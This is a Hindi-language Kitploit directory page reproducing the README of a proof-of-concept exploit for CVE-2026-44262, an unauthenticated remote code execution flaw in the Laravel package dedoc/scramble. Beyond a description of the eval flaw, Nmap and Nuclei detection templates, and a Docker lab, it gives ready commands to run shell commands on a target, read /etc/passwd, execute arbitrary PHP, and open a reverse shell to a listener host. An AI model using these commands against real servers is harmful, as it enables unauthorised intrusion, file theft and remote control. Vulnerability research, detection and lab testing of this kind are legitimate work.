Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-44262 — dedoc/scramble में बिना प्रमाणीकरण के RCE — PoC, Nmap NSE और Nuclei टेम्पलेट। | Kitploit
उपकरण/GitHubGitHub/joshuavanderpoll/cve-2026-44262
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubjoshuavanderpoll/cve-2026-44262

CVE-2026-44262

dedoc/scramble में बिना प्रमाणीकरण के RCE — PoC, Nmap NSE और Nuclei टेम्पलेट।

रिपॉजिटरी देखें
23 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

dedoc/scramble RCE (CVE-2026-44262) PoC

Python Nmap NSE Nuclei Template

📜 विवरण

CVE-2026-44262 dedoc/scramble में एक अनप्रमाणित रिमोट कोड निष्पादन भेद्यता है, जो एक Laravel API दस्तावेज़ीकरण जनरेटर है।

NodeRulesEvaluator::doEvaluateExpression() eval("return $code;") से पहले extract($variables) को कॉल करता है। जब कोई कंट्रोलर $request->input() को $code नामक वेरिएबल में असाइन करता है और उसे वैलिडेशन रूल के रूप में उपयोग करता है, तो Scramble उस वेरिएबल को ट्रैक करता है और उसे eval स्कोप में पास कर देता है। एक हमलावर /docs/api.json में क्राफ्टेड क्वेरी पैरामीटर भेजकर $code को मनमाने PHP कोड से ओवरराइट कर सकता है।

प्रभावित संस्करण: dedoc/scramble >=0.13.2, <0.13.22

✨ विशेषताएँ

  • ऑटो-डिटेक्शन — असुरक्षित पैरामीटर स्वचालित रूप से खोजने के लिए OpenAPI स्पेक को स्कैन करता है
  • टाइमिंग प्रोब — eval फायर होने की पुष्टि करने हेतु sleep() का उपयोग करके सुरक्षित, नॉन-ब्रेकिंग जाँच
  • कमांड निष्पादन — शेल कमांड चलाएँ और आउटपुट सीधे HTTP रिस्पॉन्स से कैप्चर करें
  • फ़ाइल पठन — टार्गेट फाइलसिस्टम से मनमानी फ़ाइलें पढ़ें
  • PHP कोड निष्पादन — RCE के माध्यम से रॉ PHP कोड निष्पादित करें
  • रिवर्स शेल — PHP proc_open रिवर्स शेल, जिसमें bash या busybox की आवश्यकता नहीं है
  • बल्क स्कैनिंग — एक फ़ाइल से कई टार्गेट स्कैन करें
  • OS डिटेक्शन — Windows/Linux/Darwin का स्वतः पता लगाता है और पेलोड को तदनुसार समायोजित करता है
  • Nmap NSE — पैसिव + टाइमिंग डिटेक्शन स्क्रिप्ट (http-scramble-rce-detect.nse)
  • Nuclei टेम्पलेट — टाइमिंग पुष्टि के साथ दो-चरणीय डिटेक्शन (CVE-2026-44262.yaml)

🛠️ इंस्टॉलेशन

कोई बाहरी निर्भरता नहीं — केवल Python stdlib का उपयोग करता है।

macOS / Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com/docs/api

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com/docs/api

⚙️ उपयोग

root@kitploit:~
usage: CVE-2026-44262.py [-h] (--target TARGET | --targets FILE) [--docs-path PATH]
                   [--check] [--command CMD] [--code PHP] [--read-file PATH]
                   [--shell] [--lhost HOST] [--lport PORT] [--os OS]
                   [--useragent USERAGENT] [--timeout SECONDS]

डिटेक्शन

root@kitploit:~
# Full detection (timing + exec probe)
python3 CVE-2026-44262.py --target http://example.com/docs/api

# Safe check only — timing probe, no command execution
python3 CVE-2026-44262.py --target http://example.com/docs/api --check

# Override JSON endpoint path
python3 CVE-2026-44262.py --target http://example.com/docs/api --docs-path /api/openapi.json

# Bulk scan
python3 CVE-2026-44262.py --targets targets.txt

शोषण

root@kitploit:~
# Execute a command
python3 CVE-2026-44262.py --target http://example.com/docs/api --command "whoami"

# Read a file
python3 CVE-2026-44262.py --target http://example.com/docs/api --read-file /etc/passwd

# Execute raw PHP
python3 CVE-2026-44262.py --target http://example.com/docs/api --code "echo php_uname();"

# Reverse shell (start: nc -lv 4444)
python3 CVE-2026-44262.py --target http://example.com/docs/api --shell --lhost 172.17.0.1 --lport 4444

Nmap और Nuclei (पैसिव + टाइमिंग, कोई शोषण नहीं)

root@kitploit:~
# Nmap
nmap -p 80,443 --script http-scramble-rce-detect example.com

# Nuclei
nuclei -t CVE-2026-44262.yaml -u http://example.com

🐋 डॉकर लैब

असुरक्षित ऐप (dedoc/scramble v0.13.21) के साथ एक सेल्फ-कंटेन्ड Docker वातावरण शामिल है। विवरण के लिए docker/DOCKER.md देखें।

root@kitploit:~
cd docker/
docker compose up -d
python3 ../CVE-2026-44262.py --target http://localhost:8000/docs/api

🕵🏼 संदर्भ

  • dedoc/scramble
  • GitHub Advisory — GHSA-4rm2-28vj-fj39
  • NVD — CVE-2026-44262
  • HackIndex.io — CVE-2026-44262

📢 अस्वीकरण

यह टूल केवल शैक्षिक और शोध उद्देश्यों के लिए प्रदान किया गया है। निर्माता इस टूल के किसी भी दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेता है।

टूल डाउनलोड करें